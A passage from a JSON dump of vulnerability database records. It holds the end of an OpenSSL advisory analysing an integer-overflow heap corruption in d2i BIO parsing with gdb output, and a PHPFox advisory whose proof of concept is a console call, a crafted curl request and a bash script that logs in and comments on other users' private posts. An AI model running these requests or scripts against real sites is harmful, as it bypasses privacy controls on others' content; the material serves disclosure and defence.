0x000000000054c132 in d2i_X509_bio (bp=0x9173a0, x509=0x0) at x_all.c:150\r\n#3 0x000000000043b7a7 in load_cert (err=0x8a1010, file=0x0, format=1, pass=0x0, e=0x0, cert_descrip=0x5ebcc0 "Certificate") at apps.c:819\r\n#4 0x0000000000422422 in x509_main (argc=0, argv=0x7fffffffe458) at x509.c:662\r\n#5 0x00000000004032d9 in do_cmd (prog=0x9123e0, argc=3, argv=0x7fffffffe440) at openssl.c:489\r\n#6 0x0000000000402ee6 in main (Argc=3, Argv=0x7fffffffe440) at openssl.c:381\r\n(gdb) list\r\n218 want=HEADER_SIZE;\r\n219 }\r\n220 else \r\n221 {\r\n222 /* suck in c.slen bytes of data */\r\n223 want=(int)c.slen;\r\n224 if (want > (len-off))\r\n225 {\r\n226 want-=(len-off);\r\n227 if (!BUF_MEM_grow_clean(b,len+want))\r\n(gdb) pt len\r\ntype = int\r\n(gdb) pt want\r\ntype = int\r\n(gdb) p len\r\n$28 = 1431655797\r\n(gdb) p want\r\n$29 = 2147483646\r\n(gdb) p len+want\r\n$30 = -715827853\r\n(gdb) s\r\nBUF_MEM_grow_clean (str=0x917440, len=18446744072993723763) at buffer.c:133\r\n(gdb) p/x len\r\n$31 = 0xffffffffd5555573\r\n\r\nHere len+want wraps to a negative value, which is sign extended to a large\r\nsize_t for BUF_MEM_grow_clean. Now the call to CRYPTO_realloc_clean() truncates\r\nthis back into a signed int:\r\n\r\nCRYPTO_realloc_clean (str=0x7fff85be4010, old_len=1908874388, num=477218632, file=0x626661 "buffer.c", line=149) at mem.c:369\r\n\r\nNow old_len > num, which openssl does not handle, resulting in this:\r\n\r\n ret = malloc_ex_func(num, file, line);\r\n\r\n memcpy(ret, str, old_len);\r\n\r\nEffectively a textbook heap overflow. It is likely this code is reachable via\r\nthe majority of the d2i BIO interfaces and their wrappers, so most applications\r\nthat handle untrusted data via OpenSSL should take action.\r\n\r\nNote that even if you do not use d2i_* calls directly, many of the higher level\r\nAPIs will use it indirectly for you. Producing DER data to demonstrate this\r\nis relatively easy for both x86 and x64 architectures.\r\n\r\n-------------------\r\nSolution\r\n-----------------------\r\n\r\nThe OpenSSL project has provided an updated version to resolve this issue.\r\n\r\nhttp://www.openssl.org/\r\nhttp://www.openssl.org/news/secadv_20120419.txt\r\n\r\n-------------------\r\nCredit\r\n-----------------------\r\n\r\nThis bug was discovered by Tavis Ormandy, Google Security Team.\r\n\r\nAdditional thanks to Adam Langley also of Google for analysis and designing a fix.\r\n\r\n-- \r\n-------------------------------------\r\ntaviso at cmpxchg8b.com | pgp encrypted mail preferred\r\n-------------------------------------------------------\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-72797"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA256\r\n\r\nCNA primary\r\n MITRE Corporation ( cve-assign@mitre.org )\r\n\r\n\r\nSoftware Vendors\r\n PHPFox ( http://www.phpfox.com )\r\n Product ( http://demo.phpfox.com )\r\n Version: v3.7.3, v3.7.4 and v3.7.5\r\n\r\nResearch\r\n Wesley Henrique Leite ( wesleyhenrique [\\NOSPAM**] gmail \\NOSPAM// com )\r\n\r\n\r\n[+] INFORMATION\r\n Vendor Notified : 2013-12-13\r\n Vendor Homepage : www.phpfox.com\r\n\r\n[+] CVEID\r\n CVE-2013-7195\r\n CVE-2013-7196\r\n\r\n Released fix 2014-02-26:\r\n [+] Flag as "like" a publication set to "Only Me"\r\n Update to version v3.7.5\r\n Released fix 2014-04-03:\r\n [+] Comment on a publication set to "Only Me"\r\n Update to version v3.7.6\r\n\r\nDescription of the problem:\r\n [ + ] Flag as "like" a publication set to "Only Me" (v3.7.3 and v3.7.4)\r\n [ + ] Comment on a publication set to "Only Me" (v3.7.3, v3.7.4 and v3.7.5)\r\n\r\n\r\n[ + ] Flag as "like" a publication set to "Only Me" (v3.7.3 and v3.7.4)\r\n\r\n\r\nAnalyzing how the "comment" and "like" are added to a publication, it\r\nwas possible to manipulate them so that a publication set to "ONLY ME"\r\ncan receive an external comment or mark this as "like", not even having\r\nany relationship with the user. The private publications "Only me" can\r\neasily be discovered by analyzing the source of the page, since all\r\nreceive a unique identifier, to know these identifiers in the source\r\none can easily identify the holes in the sequence.\r\n\r\n\r\n$Core.Like.Actions.doLike(0, 'user_status', 26, 0, this);\r\n$Core.Like.Actions.doLike(0, 'user_status', 28, 0, this);\r\n$Core.Like.Actions.doLike(0, 'user_status', 30, 0, this);\r\n$Core.Like.Actions.doLike(0, 'user_status', 33, 0, this);\r\n\r\n\r\nUnique ID Possible Privacy\r\n26------------> public\r\n27------------> removed or private\r\n28------------> public\r\n29------------> removed or private\r\n30------------> public\r\n31------------> removed or private\r\n32------------> removed or private\r\n33------------> public\r\n\r\n\r\nthis logic can be applied to other types of publications such as videos,\r\nlinks and so on.\r\n\r\n\r\nto exemplify, we will asume that the post with ID 27 is private "ONLY ME", and\r\nto mark the publication with ID 27 as "like", just use the code below\r\nin your browser console:\r\n\r\n\r\njavascript console:\r\n $Core.Like.Actions.doLike(0, 'user_status', 27, 0, this);\r\n\r\n\r\nthe account will be notified and will appear in the same publication\r\nthat was marked as "like" of the user who ran the code above.\r\n\r\n\r\nThe above problem can be found in version v3.7.3 and v3.7.4 all build.\r\n\r\n\r\n[ + ] Comment on a publication set to "Only Me" (v3.7.3, v3.7.4 and v3.7.5)\r\n\r\n\r\nfollowing the logic above, we can identify possible private publications.\r\nWe'll get the ID 27 and add a comment, remembering that it is private "Only me".\r\n\r\n\r\nthese are variables of a comment.\r\n\r\n\r\n&core[ajax]=true&core[call]=comment.add&core[security_token]=686f82ec43f7dcd92784ab36ab5cbfb7\r\n&val[type]=user_status&val[item_id]=27&val[parent_id]=0&val[is_via_feed]=0&\r\nval[default_feed_value]=Write%20a%20comment...&val[text]=AQUI!!!!!!!!!!!&\r\ncore[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290\r\n\r\n\r\nVariables that can be manipulated.\r\n\r\n\r\nval[text] -------> Text of comment\r\nval[type] -------> user_status, photo, music_song, poll, link, blog\r\nval[item_id] -------> Unique ID\r\n\r\n\r\nto make the process more dynamic the script below was created.\r\n\r\n\r\n$ curl 'http://demo.phpfox.com/static/ajax.php' \\r\n'SET HERE COOKIE AND HEAD INFO FOR YOUR USER ACCOUNT' \\r\n- --data '&core[ajax]=true&core[call]=comment.add&core[security_token]=686f82ec43f7dcd92784ab36ab5cbfb7&val[type]=user_status&val[item_id]=27&val[parent_id]=0&val[is_via_feed]=0&val[default_feed_value]=Write%20a%20comment...&val[text]=AQUI!!!!!!!!!!!&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290'\r\n\r\nthis information can also be manipulated directly in the console.\r\n\r\nThe above problem can be found in version v3.7.3, v3.7.4 and v3.7.5 all build.\r\n\r\n################\r\n# SCRIPT\r\n################\r\n#!/bin/bash\r\n\r\n# This script was developed for demonstrat development team\r\n# phpFox of the problem, can be easily adapted for testing\r\n# other applications that use the framework, just by adjusting\r\n# the variable "${TARGET}"\r\n#\r\n# Comments are published with the credentials defined on variables\r\n#\r\n# USERACCOUNT = "your_mail%40example.com"\r\n# USERPASSWD = "your_password"\r\n#\r\n# even in the absence relationship between users or publication\r\n# being set to "Only Me" in the case is the focus of this study,\r\n# the review will be added.\r\n#\r\n# Wesley Henrique Leite\r\n# wesleyhenrique **(A)** gmail **NOSPAM** com\r\n# wesley **(A)** telapreta **NOSPAM** com **NOSPAM** br\r\n#\r\n# USAGE:\r\n# $ comment_only-me.bash <user_status|photo|music_song|poll|link|blog>\r\n777 'Hello all'\r\n#\r\n\r\n#AUTH\r\n# encode\r\n# @ = %40 -> teste%40example.com\r\nUSERACCOUNT=""\r\nUSERPASSWD=""\r\nCOOKIE=cookie.txt\r\nSECTOKEN=""\r\nTYPE="$1"\r\nITEM_ID=$2\r\nMSG="$3"\r\nTARGET="http://demo.phpfox.com"\r\nURL_LOGIN="${TARGET}/user/login"\r\nURL_AJAX="${TARGET}/static/ajax.php"\r\nUSER_AGENT="User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\nAppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107\r\nSafari/537.36"\r\n\r\n\r\nUSAGE="Type Item_id and MSG is required\n $0\r\n<user_status|photo|music_song|poll|link|blog> 777 'Hello all' "\r\n\r\n[ -z "${USERACCOUNT}" -o \\r\n -z "${USERPASSWD}" ] && {\r\n echo "Open $0 file and edit USERACCOUNT and USERPASSWD"\r\n exit\r\n}\r\n\r\n[ $# -eq 3 -a \\r\n ! -z "${TYPE}" -a \\r\n ! -z "${ITEM_ID}" -a \\r\n ! -z "${MSG}" ] || { echo -e "${USAGE}" ; exit ; }\r\n\r\n> ${COOKIE}\r\n\r\n# GET COOKIE AND SECURITY_TOKEN\r\nSECTOKEN=$(curl -D ${COOKIE} ${TARGET} |\r\n grep 'security_token' |\r\n grep -Ewo '([a-f0-9A-F]){32}' |\r\n sort -u)\r\n\r\n# AUTH USER\r\n# SAVE COOKIE\r\ncurl "${URL_LOGIN}" \\r\n -b "${COOKIE}" \\r\n -H "Origin: ${TARGET}" \\r\n -H 'Accept-Encoding: gzip,deflate,sdch' \\r\n -H 'Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.6,en;q=0.4' \\r\n -H "${USER_AGENT}" \\r\n -H 'Content-Type: application/x-www-form-urlencoded' \\r\n -H 'Accept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'\r\n\\r\n -H 'Cache-Control: max-age=0' \\r\n -H 'Connection: keep-alive' \\r\n -D ${COOKIE} \\r\n --data "core%5Bsecurity_token%5D=${SECTOKEN}&val%5Blogin%5D=${USERACCOUNT}&val%5Bremember_me%5D=&val%5Bpassword%5D=${USERPASSWD}"\r\n\\r\n --compressed\r\n\r\n\r\n### COMMENT ADD\r\ncurl "${URL_AJAX}" \\r\n -b "${COOKIE}" \\r\n -H "Origin: ${TARGET}" \\r\n -H "${USER_AGENT}" \\r\n -H 'Content-Type: application/x-www-form-urlencoded' \\r\n -H 'Accept: text/javascript, application/javascript,\r\napplication/ecmascript, application/x-ecmascript, */*; q=0.01' \\r\n -H 'X-Requested-With: XMLHttpRequest' \\r\n -H 'Connection: keep-alive' \\r\n --data "&core[ajax]=true&core[call]=comment.add&core[security_token]=${SECTOKEN}&val[type]=${TYPE}&val[item_id]=${ITEM_ID}&val[parent_id]=0&val[is_via_feed]=${ITEM_ID}&val[default_feed_value]=Write%20a%20comment...&val[text]=${MSG}&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290"\r\n\\r\n --compressed\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niF4EAREIAAYFAlM/lEEACgkQd9Htm4AVoW9ToAEAnnZogdYRlKCi3RDfJgkLvbK8\r\nRIQcsz5fsiU9d3nrVKwBAIJFfcsdfVspUpExdtuEFgPJ7Sj7thHURfVHvFGSXvvj\r\n=6hMg\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-05-05T00:00:00", "published": "2014-05-05T00:00:00", "id": "SECURITYVULNS:DOC:30624", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30624", "title": "Vulnerability in PHPFox v3.7.3, v3.7.4 and v3.7.5 all build [ CVE-2013-7195, CVE-2013-7196 ]", "type": "securityvulns", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}]}
